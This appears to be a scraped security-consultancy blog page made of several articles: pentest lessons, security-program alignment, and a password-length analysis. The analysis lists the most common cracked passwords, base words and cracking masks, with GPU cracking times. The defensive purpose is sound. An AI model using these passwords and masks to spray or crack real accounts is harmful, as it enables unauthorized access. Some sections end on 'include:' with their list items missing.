Look first to your organization and/or your customers. If you are in manufacturing, and have adopted ISO for your manufacturing standards, then the ISO 27000 series (specifically ISO/IEC 27001:2013) probably makes sense. If your organization will be relying on credit card processing, then the PCI DSS framework may be mandatory. If your client base includes governmental entities, then NIST will be a requirement.

So, consider this your crash warning indicator light. It is blinking, and you should probably do something about it!

“The first step towards getting somewhere is to decide that you are not going to stay where you are. “

-Chauncey Depew

Coming from someone who can officially say that information security has given me a few gray hairs, I'm writing this article from the perspective of someone who's been around the block. With over 15 years in information security, I feel like I've seen it all. And while I can't claim to be a great penetration tester myself, I can say that I work with (and have worked with) some truly talented pentesters. I can also feel confident stating that I've read more pentest reports than most.

So, having this background… I get asked by businesses and defenders all the time, "What advice would you give?" and, "What lessons can be learned?"

Well, thanks for asking…. (insert deep breath here)

1. P@ssw0rds are still w3$k!

In fact, we've known that passwords are a weak form of authentication since the moment the first password-based authentication system was created. Passwords can be weak for several compounding reasons. Whether it be due to their limited length and complexity (keyspace) or the fact that they can be shared, guessed, written down, or reused, let's face it, they provide almost no security. Until we stop using passwords or ensure that every last account has a strong and unique password that can't be guessed or cracked, we accept significant risk.


2. Multifactor authentication

(MFA) is not enabled or required for all remote access. While it is almost common place now to find MFA on VPNs, we still find roles, groups, and even URLs allowing MFA to be bypassed. Further, other types of remote access like Citrix and Remote Desktop, Outlook Web Access, and SSH are more overlooked. Remember that when passwords are weak (and they probably are), attackers will be quick to take advantage when MFA is not enforced.


3. Two wrongs don't make a right

Your mom said it, and now I will too. In SynerComm's reporting, we consider both #1 and #2 to be high-severity findings in our pentest reports. When combined, these result in a critical weakness. Password spraying allows an attacker to easily guess common passwords (think Summer19) and gain immediate access to email and internal networks.


4. Vulnerability scanners provide a false sense of security

Don't get me wrong, get your EternalBlue and Heartbleed patched, but don't think just because you're well patched that you are secure. Vulnerability scanning is important, but at its best, it discovers live systems, missing patches, default credentials, weak services, and other well-known vulnerabilities. What it doesn't tell you is that your systems may already include a roadmap to access anything and everything on your network.

Pentesters, just like modern attackers, typically don't rely on missing patches to traverse networks, gather privileges, and access protected data. No vulnerability scanner will warn you that all laptops share the same local administrator password or that a domain admin RDP'd into one of them to troubleshoot an issue (and left their cleartext password cached in memory).


5. Your next-generation firewall and endpoint solution could also provide a false sense of security

Again, don't get me wrong, I am a big fan of solutions like Palo Alto and CrowdStrike.  BUT, simply purchasing and deploying these solutions doesn't make your networks and systems more secure. Like any control, all security solutions must be configured, tuned, and VALIDATED.

Lesson #5: It isn't uncommon to find best of breed security controls running in "monitor only" or "log only" state.  After all, the easiest way to start is to convert that old layer 3 ASA config and turn on the security features later. And let's not forget that ALL IT EMPLOYEES should always be whitelisted in these controls because we don't need that stuff in our way.


6. Maybe this should be #1, but I think hope we've all got this figured out…Compliance does not result in security

Contractual, industry, and especially regulatory compliance are all important, but don't let compliance get in the way of being secure. Information security programs should be designed to protect the confidentiality, integrity, availability, and usefulness of information; compliance should just be a benefit of good security.


7. Last, but not least…  If you develop your own apps, contract development of apps, or acquire custom developed applications, assess them!

Secure coding isn't a new concept, but the concept is (unfortunately) new still to many developers. Widely-used and commercial off the shelf (COTS) applications are heavily scrutinized, but your applications may be waiting for the right attacker to come along. A lesson worth sharing is that a breach can be far more costly than validating and potentially fixing issues before the attack.


If you've made it to this point, thank you for reading through. This often isn't what people expect to hear or even want to hear, but sometimes honesty can be blunt and surprising. My advice is always start with a solid foundation and then build on it. Use frameworks like the CIS Top 20 to provide a prioritized roadmap and don't get caught skipping ahead. Good security can be as simple as keeping to the basics.

The Challenge

You budget for, enable, and staff your organization’s information security program with people, technology, and visionary prowess. As you step back and observe do you find yourself wondering: Does the business consider the program relevant? Is my security program effective? In a business environment where resources are limited, compliance requirements abound, and budgets are constantly challenged to meet cost containment targets, this article will explore a strategy to align information technology (IT), information security (IS) (note: one is not necessarily inclusive of the other – a topic for another article), system and data owners (SDO), aka: your business units, and leadership.

The Opportunity

Aligning IT, IS, SDO, and leadership will strengthen information systems’ value and inherent information security situational awareness, an awareness I would argue is incorrectly shouldered by IT. When it comes to managing information assets to assure the confidentiality, integrity, and availability (CIA) of an organization’s systems and data, what roles are in play? Good question, here are the primary ones found in any organization, with roles defined:

How can you effectively secure what you do not fully understand? Effectively securing an organization’s systems and data requires a clear understanding, outside of IT, of information systems value and risk. Components of a total information systems picture may include:

An effective communications strategy will strengthen information systems’ alignment between IT, IS, and the business. When an organization raises the level of awareness with the” total information systems picture”, a business process will take hold that facilitates system discussions leading to meaningful system decisions. While there can be many types of system decisions organizations must consider, a few examples may include:

The Plan

A strategy for enabling effective communications will look different from one organization to another. A communications strategy should consider an organization’s unique characteristics, culture, and climate. Activities that can contribute to enabling an effective communications strategy should include:

Planning, execution, and effective communications can produce meaningful results and aid in your information security program being experienced as relevant.

Background

While experts have agreed for decades that passwords are a weak method of authentication, their convenience and low cost has kept them around. Until we stop using passwords or start using multi-factor authentication (for everything), a need for stronger passwords exists. And as long as people create their own passwords that must be memorized, those passwords will remain weak and guessable. This blog/article/rant will cover a brief background of password cracking as well as the justification for SynerComm’s 14-character password recommendation.

First things first: What is a password?

Authentication is the process of verifying the identify of a user or process, and a password is the only secret “factor” used in authentication. For the authentication process to be trusted, it must positively identify the account owner and thwart all other attempts. This is critical, because access and privileges are granted based on the user’s role. Considering how easily passwords can be shared, most have already concluded that passwords are an insufficient means of authenticating people. We must also consider that people must memorize their password and that they often need passwords on dozens if not hundreds of systems. Because of this, humans create weak, easily guessed, and often reused passwords.

Password Controls

Over the years, several password controls have emerged to help strengthen password security. This includes minimum password length, complexity, preventing reuse, and a reoccurring requirement to create new passwords. While it is a mathematical fact that longer passwords and a larger key space (more possible characters) do indeed create stronger passwords, we now know that regularly changing one’s password provides no additional security control. In fact, forcing users to regularly create new and complex passwords weakens security. It forces users to create guessable patterns or simply write them down. OK, I will stop here, we'll save the ridiculousness of password aging for a future blog.

So Why 14 Characters?

So why is 14 characters the ideal or best recommended password length? It is not. It is merely a minimal length; we still prefer to see people using even longer passwords (or doing better than passwords in the first place). SynerComm recommends a 14-character minimum for several reasons. First, 14-character passwords are very difficult to crack. Most passwords containing 9 characters or less can be brute-force guessed in under 1 day with a modern password cracking machine. Passwords with 10-12 characters and even 13-14 characters can still be easily guessed if they are based on a word and a 4-digit number. (Consider Summer2018! or your child’s name and birthday.) Next, and perhaps more importantly, 14-character minimums will prevent bad password habits and promote good ones. When done with security awareness training, users can be taught to create and use passphrases instead of passwords. Passphrases can be sentences, combinations of words, etc. that can be meaningful and easy to remember. Finally, 14 characters is the largest “Minimal Password Length” currently allowed by Microsoft Windows. While Windows supports very long passwords, it is not simple to enforce a minimum greater than 14 characters (PSOs can be used to increase this in Windows 2008 and above, and registry hacks from anything older, but it can be a tedious process and introduces variables into the management and troubleshooting of your environment).

The remainder of this article provides facts and evidence to support our recommendations.

Analysis of Password Length

SynerComm collected over 180,000 NTLM password hashes from various breached domain controllers and attempted to crack them using dictionary, brute-force, and cryptanalysis attacks. The chart below shows the password lengths of the over 93,000 passwords cracked. It is interesting to find passwords that fall drastically below the usual minimum length of eight characters. Although few, it is also worth noting that 20, 21 and 22-character passwords (along with one 27-character password) were cracked in these analyses.

Passwords Cracked = 93,706. Total unique entries of those passwords cracked = 68,161
Passwords of 9 or fewer characters account for 50% of those cracked; 12 or fewer, 75%
Password Length - Number of Cracked Passwords
1 = 3 (0.0%)
2 = 2 (0.0%)
3 = 137 (0.15%)
4 = 27 (0.03%)
5 = 405 (0.43%)
6 = 1527 (1.63%)
7 = 3827 (4.08%)
8 = 26191 (27.95%)
9 = 23677 (25.27%)
10 = 17564 (18.74%)
11 = 9098 (9.71%)
12 = 6267 (6.69%)
13 = 2915 (3.11%)
14 = 1063 (1.13%)
15 = 577 (0.62%)
16 = 276 (0.29%)
17 = 81 (0.09%)
18 = 39 (0.04%)
19 = 13 (0.01%)
20 = 10 (0.01%)
21 = 1 (0.0%)
22 = 4 (0.0%)
23 = 0 (0.0%)
24 = 0 (0.0%)
25 = 0 (0.0%)
26 = 1 (0.0%)
27 = 1 (0.0%)

Analysis of Password Composition

*Note: The password "acme" was used to replace specific company names. For example, if the password "synercomm123$" would have been found in a SynerComm password dump it would have been replaced with "acme123$". This change occurred only to serve the top 10 password and base word tables. Analyses of length and masks were performed without this change.

Top 10 passwords
Password1 = 543 (0.58%)
Summer2018 = 424 (0.45%)
Summer18 = 395 (0.42%)
acme80 = 368 (0.39%)
Fall2018 = 362 (0.39%)
Good2go = 350 (0.37%)
yoxvq = 345 (0.37%)
Gr8team = 338 (0.36%)
Today#08 = 308 (0.33%)
Spring2018 = 219 (0.23%)
Top 10 base words
password = 1993 (2.13%)
summer = 1663 (1.77%)
acme = 1619 (1.73%)
spring = 734 (0.78%)
fall = 706 (0.75%)
welcome = 652 (0.7%)
winter = 577 (0.62%)
w0rdpass = 562 (0.6%)
good2go = 351 (0.37%)
yoxvq = 345 (0.37%)
Last 4 digits (Top 10)
2018 = 3037 (3.24%)
2017 = 821 (0.88%)
1234 = 733 (0.78%)
2016 = 659 (0.7%)
2015 = 588 (0.63%)
2014 = 561 (0.6%)
2013 = 435 (0.46%)
2012 = 358 (0.38%)
2010 = 296 (0.32%)
2019 = 286 (0.31%)
Masks (Top 10)
?u?l?l?l?l?l?d?d (6315) (8 char)
?u?l?l?l?l?l?d?d?d?d (4473) (10 char)
?u?l?l?l?l?l?l?d?d (4021) (9 char)
?u?l?l?l?d?d?d?d (3328) (8 char)
?u?l?l?l?l?d?d?d?d (2985) (9 char)
?u?l?l?l?l?l?l?l?d?d (2742) (10 char)
?u?l?l?l?l?l?l?d (2601) (8 char)
?u?l?l?l?l?l?l?l?d (2371) (9 char)
?u?l?l?l?l?l?l?d?d?d?d (1794) (11 char)
?u?d?d?d?d?d?d?d?d (1756) (9 char)

Password Hash Cracking Speeds

When performing our own password cracking, SynerComm uses a modern password cracker built with 8 powerful GPUs. Typically used by gamers to create realistic three-dimensional worlds, these graphics cards are remarkably efficient at performing the mathematical calculations required to defeat password hashing algorithms. Most 8-character passwords will crack in 4.5 hours or less. While the same attack against a 9-character password could take up to 18 days to complete, we can reduce the key space (possible characters used in passwords) and complete 10-11 character attacks in just 1-2 days or less.

Password Best Practices

  1. Do not share your password with anyone!
  2. Do not store passwords in spreadsheets, documents, or email! Also avoid storing passwords in your browser (IE, Firefox, Chrome).
  3. Create passphrases instead of passwords. Long passwords are always stronger than short passwords. Passwords shorter than 10 characters can be easily and quickly cracked if their hashes become available to the attacker. SynerComm recommends enforcing at least a 12-character minimum for standard user accounts but suggests using a 14-character minimum to promote good password creation methods. Privileged accounts such as domain administrators should have even longer passwords.
  4. While password complexity is less critical with long (>=14 char) passwords, it still helps ensure a larger key space. Encourage users to use less common characters such as spaces, commas, and any other special character found on the keyboard. (Spaces can make an enormous difference!)
  5. Never reuse the same password on multiple accounts. While it is easier to remember 1 password than 100, our next best practice will provide a solution to that problem too. Dumps containing passwords from breaches are great starting places to guessing a user’s password.
  6. Use a password safe. Modern password managers can sync stored passwords between computers and mobile devices. By using a safe, most users only need to remember 2-3 passwords and the rest can be stored securely in a safe.
    1. When using a safe, it is best practice to allow the application to generate most passwords. This way you can create 15-20 character completely random passwords that you never need to know or memorize.
  7. Implement multi-factor authentication whenever possible. Passwords will always be a weak and vulnerable form of authentication. Using multi-factor greatly reduces the chances of a successful authentication attack. Multi-factor authentication should be used for ALL (no exceptions) remote access and should increasingly be considered for ALL privileged account access.

We created an infographic on this if you're more visual like me.

*For shared accounts (root, admin, etc.), restrict the number of people who have access to the password. Change these passwords anytime someone who could know the password leaves the organization.

~Brian Judd (@njoyzrd) with password analysis by Chad Finkenbiner

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram